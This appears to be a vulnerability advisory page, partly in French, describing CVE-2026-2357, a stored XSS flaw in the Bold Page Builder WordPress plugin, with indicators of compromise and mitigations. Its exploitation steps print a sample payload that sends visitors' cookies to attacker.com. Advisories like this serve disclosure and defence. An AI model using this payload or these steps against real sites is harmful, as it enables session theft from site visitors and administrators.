CVE-2026-2357
WordPress Analyse et atténuation des vulnérabilités

Aperçu

CVE-2026-2357 is a Stored Cross-Site Scripting (XSS) vulnerability in the Bold Page Builder plugin for WordPress, affecting all versions up to and including 5.6.8. The flaw exists in the plugin's bt_bb_shortcode shortcode handler due to insufficient input sanitization and output escaping on user-supplied attributes. It was published on August 16, 2026, and assigned by Wordfence. The vulnerability carries a CVSS v3.1 base score of 6.4 (Medium) (GitHub Advisory, Wordfence).

Détails techniques

The root cause is CWE-79 (Improper Neutralization of Input During Web Page Generation), where user-supplied shortcode attributes passed to bt_bb_shortcode are neither properly sanitized on input nor escaped on output before being rendered in page content. An authenticated attacker with contributor-level access or higher can craft a malicious shortcode containing arbitrary JavaScript and embed it in a WordPress page or post. Because the payload is stored server-side, it executes in the browser of any user who subsequently visits the affected page — no additional user interaction beyond page access is required. A patch commit is referenced in the WordPress plugin repository (GitHub Advisory, Plugin Changeset).

Impact

Successful exploitation allows an authenticated contributor (or higher-privileged user) to permanently inject malicious JavaScript into WordPress pages, which executes in the browsers of all site visitors. This can result in session cookie theft, credential harvesting, unauthorized actions performed on behalf of victims (including administrators), and redirection to malicious external sites. While availability is not directly impacted, the confidentiality and integrity of user sessions and site content are at risk (GitHub Advisory, Wordfence).

Exploitabilité

There is no public proof-of-concept exploit and no evidence of in-the-wild exploitation at the time of disclosure. The EPSS score is 0.0, indicating a very low probability of exploitation in the near term. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation requires at minimum a contributor-level WordPress account, which limits the attack surface compared to unauthenticated vulnerabilities (GitHub Advisory, Wordfence).

Étapes d’exploitation

  1. Reconnaissance: Identify WordPress sites running the Bold Page Builder plugin at version 5.6.8 or earlier (e.g., by checking plugin metadata via /wp-content/plugins/bold-page-builder/readme.txt or using web scanning tools).
  2. Obtain contributor access: Register or compromise a WordPress account with at least contributor-level privileges on the target site.
  3. Craft malicious shortcode: Create a page or post using the Bold Page Builder editor and insert a bt_bb_shortcode element with a malicious attribute containing a JavaScript payload, e.g., an attribute value such as "><script>document.location='https://attacker.com/steal?c='+document.cookie</script>.
  4. Publish or submit content: Save or submit the page/post for publication. The malicious script is stored in the WordPress database without sanitization.
  5. Trigger execution: When any user (including administrators) visits the affected page, the injected script executes in their browser, enabling cookie theft, session hijacking, or further malicious actions (GitHub Advisory, Wordfence).

Indicateurs de compromis

  • Logs: WordPress access logs showing POST requests to wp-admin/post.php or REST API endpoints containing bt_bb_shortcode with unusual attribute values including <script>, javascript:, or encoded variants (%3Cscript%3E).
  • Database: WordPress wp_posts or wp_postmeta tables containing bt_bb_shortcode entries with embedded <script> tags or event handler attributes (e.g., onerror, onload) in shortcode attribute values.
  • Network: Outbound HTTP requests from victim browsers to unexpected external domains shortly after visiting pages containing Bold Page Builder content, potentially indicating cookie exfiltration.
  • File System: No direct file system artifacts expected for stored XSS; however, review plugin files in wp-content/plugins/bold-page-builder/ for unauthorized modifications.
  • User Activity: Audit logs showing contributor or author accounts creating or editing pages with Bold Page Builder shortcodes containing suspicious attribute content (Wordfence).

Atténuation et solutions de contournement

Update the Bold Page Builder plugin to a version newer than 5.6.8 as soon as a patched release is available; a fix commit has been submitted to the WordPress plugin repository (Plugin Changeset). As interim mitigations: restrict contributor and author roles to only fully trusted users; deploy a Web Application Firewall (WAF) configured to detect and block XSS payloads in shortcode parameters; and implement a strict Content Security Policy (CSP) header to limit inline script execution. Regularly audit page content for unexpected script injections and monitor user activity logs for unauthorized edits (Wordfence).

Réactions de la communauté

The vulnerability was reported and assigned by Wordfence, a leading WordPress security firm, and published to the GitHub Advisory Database on August 16, 2026. No notable independent researcher commentary, media coverage, or significant social media discussion beyond automated CVE tracking feeds has been observed at this time (GitHub Advisory, Wordfence).

Ressources additionnelles


SourceCe rapport a été généré à l’aide de l’IA

Apparenté WordPress Vulnérabilités:

Identifiant CVE

Sévérité

Score

Technologies

Nom du composant

Exploit CISA KEV

A corrigé

Date de publication

CVE-2024-13784CRITICAL9.8
  • arforms-form-builder
NonOuiAug 16, 2026
CVE-2026-17087HIGH7.5
  • wp-travel-engine
NonOuiAug 16, 2026
CVE-2026-2497HIGH7.2
  • gallery-plugin
NonOuiAug 16, 2026
CVE-2026-17608MEDIUM6.5
  • wp-compress-image-optimizer
NonOuiAug 16, 2026
CVE-2026-2357MEDIUM6.4
  • bold-page-builder
NonOuiAug 16, 2026

Évaluation gratuite des vulnérabilités

Évaluez votre posture de sécurité dans le cloud

Évaluez vos pratiques de sécurité cloud dans 9 domaines de sécurité pour évaluer votre niveau de risque et identifier les failles dans vos défenses.

Demander une évaluation

Obtenez une démo personnalisée

Prêt(e) à voir Wiz en action ?

"La meilleure expérience utilisateur que j’ai jamais vue, offre une visibilité totale sur les workloads cloud."
David EstlickRSSI
"Wiz fournit une interface unique pour voir ce qui se passe dans nos environnements cloud."
Adam FletcherChef du service de sécurité
"Nous savons que si Wiz identifie quelque chose comme critique, c’est qu’il l’est réellement."
Greg PoniatowskiResponsable de la gestion des menaces et des vulnérabilités